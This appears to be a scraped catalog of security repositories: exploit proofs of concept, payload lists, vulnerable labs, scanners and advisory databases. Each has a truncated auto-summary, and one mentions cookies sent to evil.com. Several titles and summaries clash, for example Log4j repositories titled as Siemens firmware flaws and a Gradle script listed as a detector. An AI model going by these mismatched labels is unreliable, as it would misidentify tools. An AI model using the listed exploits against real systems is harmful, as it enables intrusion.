sudo_inject

Linux Privilege Escalation by injecting process possessing sudo tokens Inject process that have valid sudo token and activate our own sudo token Introduction We all noticed that sometimes sudo doesn't ask us for a password because he remembers us. How does he remember us and how does he identifie...

awesome-windows-exploitation

This is a curated list of Windows Exploitation resources and tools. The list is organized by category, including Windows stack overflows, Windows heap overflows, kernel-based Windows overflows, Windows kernel memory corruption, return-oriented programming, Windows memory protections, bypassing...

Exploit for CVE-2015-1805

This repository contains a collection of exploits for various vulnerabilities, including CVE-2015-1805, CVE-2017-7184, CVE-2017-2636, and CVE-2017-8890. The exploits are written in C and are designed to demonstrate the vulnerabilities in the Linux kernel. CVE-2015-1805 is a vulnerability in the...

Exploit for Observable Discrepancy in Intel Atom_C

This is a tool for checking the state of software mitigations against Spectre and Meltdown vulnerabilities. It uses the NtQuerySystemInformation API call to report the data as seen by the Windows Kernel. The tool is currently optimized for Microsoft Windows 7-10 and uses the best-working exploit...

internalblue

This is an offensive tool for Bluetooth experimentation. It is a Bluetooth experimentation framework for Broadcom and Cypress chips, which enables various features that would otherwise only be possible with a full-stack software-defined radio implementation, such as injecting and monitoring packe...

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

CVE-2021-44228 Log4j2 日志内容 JNDI RCE 缓解措施 English version 国际镜像：https://github.com/zhangyoufu/log4j2-without-jndi 国内镜像：https://code.aliyun.com/zhangyoufu/log4j2-without-jndi/tree/master 使用方式 1. 寻找部署目录下的 log4j2-core 组件 find . -name 'log4j-core.jar' 2. 对找到的 log4j2-core JAR 包实施缓解措施 方式1: 使用 zip 命令从 JAR...

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

This repository contains Nmap NSE Network Sniffer Engine scripts designed to check for log4shell or LogJam vulnerabilities CVE-2021-44228 in various services. The scripts are written in Lua and are intended to be used with the Nmap network scanning tool. The scripts are categorized into different...

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

Log4J-RCE-Proof-Of-Concept CVE-2021-44228 This is a proof of concept of the log4j rce. Here are some links for the CVE-2021-44228: - https://www.lunasec.io/docs/blog/log4j-zero-day - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q - https://github.com/apache/logging-log4j2/pull/608 -...

Exploit for OS Command Injection in Apache Airflow

This is a proof-of-concept PoC exploit for CVE-2020-11978, a remote code execution RCE vulnerability in Apache Airflow's example DAGs. The exploit targets Airflow versions less than 1.10.11 and allows an attacker to execute arbitrary commands on the system. The exploit uses the Airflow Experiment...

PayloadsAllTheThings

It is an offensive tool for Web Application Security and Pentest/CTF. This repository contains a list of useful payloads and bypass techniques for web application security and penetration testing/CTF. The payloads are likely used for testing and exploiting vulnerabilities in web applications. The...

Exploit for Path Traversal in Wso2 Api_Manager

CVE-2022-29464 WSO2 RCE CVE-2022-29464 exploit. Details CVE-2022-29464 is critical vulnerability on WSO2 discovered by Orange Tsai. the vulnerability is an unauthenticated unrestricted arbitrary file upload which which allows unauthenticated attackers to gain RCE on WSO2 servers via uploading...

vulhub

This is a pre-built vulnerable environment based on Docker-Compose, provided by the Vulhub project. The repository contains a collection of vulnerable applications and services, along with their corresponding Dockerfiles and configuration files. The vulnerable environments are designed to help...

ProxyVulns

ProxyVulns ProxyLogon Usage: python3 26855.py 1.1.1.1 ProxyOracle url Once a victim clicks this link, evil.com will receive the cookies...

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on --- 🐱‍💻 ✂️ 🤬 LOG4J Java exploit - WAF and patches bypass tricks 📝 Description CVE-2021-44228 works on: log4j: 2.0 Upper Lookup The UpperLookup converts the passed in argument to upper case. Presumably the...

TI_Dos_Framework

This is a comprehensive web-app audit framework called TIDoS Framework. It is a Python-based tool that provides a wide range of modules for reconnaissance, scanning, enumeration, vulnerability analysis, and exploitation. The framework is designed to be user-friendly and provides a simple interfac...

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

CVE-2021-44228 Remote Code Injection In Log4j https://twitter.com/jas502n/status/1468946197629272066 SpringBoot-pom.xml default use : xml org.springframework.boot spring-boot-starter-web mvn dependency:tree java INFO | | +- org.springframework.boot:spring-boot-starter-logging:jar:2.6.1:compile IN...

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability. Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others. In this repository we have made and example...

Exploit for Path Traversal in Mikrotik Routeros

This is a PoC exploit for CVE-2018-14847 targeting RouterOS-based routers. The tool, named Meris RouterOS Checker, checks a list of IP addresses to validate if they were infected with Meris. It uses the RouterOS API, SSH, and WinBox to connect to the routers and attempt to exploit the...

Exploit for OS Command Injection in Sixapart Movable_Type

cve-2021-20837-poc PoC for the CVE-2021-20837 : RCE in MovableType This vulnerability was discovered with the collaboration of The.Criminal.One. This PoC was developped by him. BLOG POST: https://nemesis.sh/posts/movable-type-0day/...

log4shell-detector

This is a Gradle wrapper script for a Java project. Here's a breakdown of the key points: Purpose: The script is used to start a Gradle build process. License: The script is licensed under the Apache License, Version 2.0. Functionality: The script sets up the environment for the Gradle build...

Exploit for Use After Free in Google Android

This is a proof-of-concept PoC exploit for CVE-2019-2215, a use-after-free vulnerability in the Android kernel. The exploit is designed to demonstrate the vulnerability and its potential impact on the system. The PoC exploit is written in C++ and uses the Clang compiler. It includes a function...

poc

Proof of Concepts As the result of plugin writing or just general bug hunting, researchers at Tenable often stumble upon new and interesting vulnerabilities. These vulnerabililities are shared with the community on our company blog, Medium, or through our research advisories. We've decided to...

metasploit-framework

This is a Metasploit Framework repository. The Metasploit Framework is an open-source penetration testing platform used for identifying vulnerabilities in computer systems and applications. It is a comprehensive toolset for security professionals to simulate attacks and test defenses. The...

exifcleaner

Cross-platform desktop GUI app to clean image metadata...

Exploit for CVE-2020-1472

!Pythonpython-shield CVE-2020-1472 CVE-2020-1472 - Zero Logon vulnerability Python implementation Description A Python script which uses the Impacket library to test for CVE-2020-1472 - Zerologon vulnerability credits to Secura research. The flaw stems from the Netlogon Remote Protocol, available...

Scanners-Box

This is a collection of open-source scanners from the GitHub platform, including subdomain enumeration, database vulnerability scanners, weak password or information leak scanners, port scanners, fingerprint scanners, and other large-scale scanners. The collection is maintained by We5ter and...

Exploit for CVE-2018-3149

log4j2-exploits https://user-images.githubusercontent.com/37479424/145661983-131eb84a-9ac5-4014-9f6b-10b69d8d7cf4.mp4 This fundamental vulnerability was reported by CVE-2018-3149 and patched by this article. 8u121 Release Notes However, the logging library for java called log4j2 had JNDILookup,...

InfiniteWP-exploit

It is an exploit module for InfiniteWP Client 1.9.4.5 - Authentication Bypass. The primary CVE ID is not explicitly stated, but the exploit is based on a vulnerability disclosed at https://0day.work/infinitewp-client-1-9-4-5-authentication-bypass/. The target product/service is InfiniteWP Client,...

Exploit for OS Command Injection in Hikvision Ds-2Cd2026G2-Iu\/Sl_Firmware

This is a PoC exploit for CVE-2021-36260, a command injection vulnerability in the web server of some Hikvision product. The vulnerability allows an attacker to launch a command injection attack by sending malicious commands to the device. The exploit is implemented in Python and provides several...

Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Google Android

This repository contains a PoC Proof of Concept code for the BlueBorne vulnerabilities. The BlueBorne vulnerabilities are a set of vulnerabilities in the Bluetooth Low Energy BLE protocol that allow an attacker to remotely execute code on a device. The vulnerabilities were discovered in 2017 and...

Exploit for Improper Input Validation in Vmware Vcenter_Server

No description provided...

vuls

This is an open-source vulnerability scanner for Linux and FreeBSD, written in Go. It is an agentless scanner, meaning it does not require any additional software to be installed on the target systems. The scanner is designed to be easy to use and provides a simple command-line interface. The...

Exploit for Insufficiently Protected Credentials in Linuxfoundation Containerd

It is an offensive tool for Kubernetes. The repository contains information on various methods to hack and exploit Kubernetes clusters, including articles, videos, and presentations on topics such as securing clusters by eliminating risky permissions, Kubernetes pentest methodology, and container...

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

PoC exploit for CVE-2021-44228, a Java logging library vulnerability. The target product/service is Apache Log4j, a Java logging library. The vulnerability class/vector is RCE Remote Code Execution via JNDI Java Naming and Directory Interface lookup. The probable entry points are JNDI lookups...

advisory-db

This is a security advisory database for Rust crates published through crates.io. The database is stored in TOML format and contains information about security advisories filed against various Rust crates. The advisories include details such as the affected package, patched versions, and a...

CUSEC-2020

Based on the provided code and context, here is a summary of the analysis: Classification: This is an Insecure Direct Object Reference IDOR bug. Background: The bug occurs when the application does not verify that the current user is authorized to access a resource with a specific ID. In this cas...

DependencyCheck

This is an open-source project for a software composition analysis utility that detects publicly disclosed vulnerabilities in application dependencies. The project is called OWASP dependency-check. The project is written in Java and is designed to be used in a variety of environments, including...

Exploit for Improper Initialization in Linux Linux_Kernel

This is a PoC exploit for the Dirty Pipe vulnerability CVE-2022-0847 on Android, specifically targeting Pixel 6 devices with a security patch level from 2022-02-05 to 2022-04-05. The exploit is designed to overwrite readable files and can't overwrite the first byte of each page each 4096 bytes. I...

Exploit for CVE-2015-4335

This is a PoC exploit for CVE-2015-4335, a Redis Lua sandbox escape and arbitrary code execution vulnerability. The tool, named redischeck, checks a Redis instance for security vulnerabilities. It performs three checks: 1 if the AUTH command is set, 2 if the CONFIG command has been renamed, and 3...

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

This is a PoC exploit for CVE-2021-44228, a remote code execution vulnerability in the Apache Log4j logging library. The repository, mirrorsyahoo/check-log4j, contains a tool called check-log4j that attempts to determine if a host is vulnerable to this vulnerability by looking for the presence of...

MaraDNS

MaraDNS is an open-source DNS server. It is a small, lightweight, and highly customizable DNS server that can be used as an authoritative or recursive nameserver. MaraDNS is written in C and is designed to be easy to configure and use. The repository contains a variety of files, including a READM...

Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft

SMBGhost Simple scanner for CVE-2020-0796 - SMBv3 RCE. The scanner is for meant only for testing whether a server is vulnerable. It is not meant for research or development, hence the fixed payload. It checks for SMB dialect 3.1.1 and compression capability through a negotiate request. A network...

MaraDNS_1

This is a repository for MaraDNS, a small open-source DNS server. The repository contains various files and scripts for building and testing MaraDNS, including a Dockerfile for creating a Docker image to test installing MaraDNS on a fresh Ubuntu 22.04 virtual machine. The repository includes a...

vulnerabilitydb

This is a public vulnerability database repository for Snyk, a tool that helps find and fix known vulnerabilities in Node.js dependencies. The repository contains a list of folders for vulnerable npm packages, each with a subfolder for a specific date YYYYMMDD containing data files. The data is...

Exploit for Use After Free in Google Android

This is a proof-of-concept PoC application demonstrating the power of an Android kernel arbitrary R/W, specifically targeting CVE-2019-2215. The application, named Qu1ckR00t, is designed to exploit this vulnerability to achieve root access on an Android device. The exploit is implemented in the...

ossindex-maven-plugin

It is an offensive tool for dependency audit. The primary CVE ID is not present in the provided context. The target product/service or framework is Maven, and the vulnerability class/vector is dependency audit. Notable dependencies/tooling include the OSS Index REST API v2.0. The execution contex...

shellshocker-pocs

This is a collection of Proof of Concepts PoCs and potential targets for the ShellShocker vulnerability. The PoCs are designed to exploit the vulnerability in various products and services, including XMPP ejabberd, Mailman, MySQL, NFS, Bind9, FTP, and others. The PoCs are primarily focused on...

ruby-advisory-db

This is a database of security advisories for Ruby libraries, maintained by the ruby-advisory-db project. The database contains a list of directories that match the names of Ruby libraries on rubygems.org, with each directory containing one or more advisory files for the library. Each advisory fi...

graphql-playground

This repository is an offensive tool for GraphQL. It is a GraphQL IDE for better development workflows, featuring context-aware autocompletion and error highlighting, interactive, multi-column docs, and support for real-time GraphQL Subscriptions. The tool is vulnerable to an XSS Reflection attac...

Exploit for Cross-site Scripting in Jquery

Watchdog Tool Description ------------------------- Watchog is an integration of open source security tools aimed to provide a holistic security view for a given domain/IP. The way Watchdog is built, it can be used by product security teams, red teams and also by bug bounty hunters to get a 360°...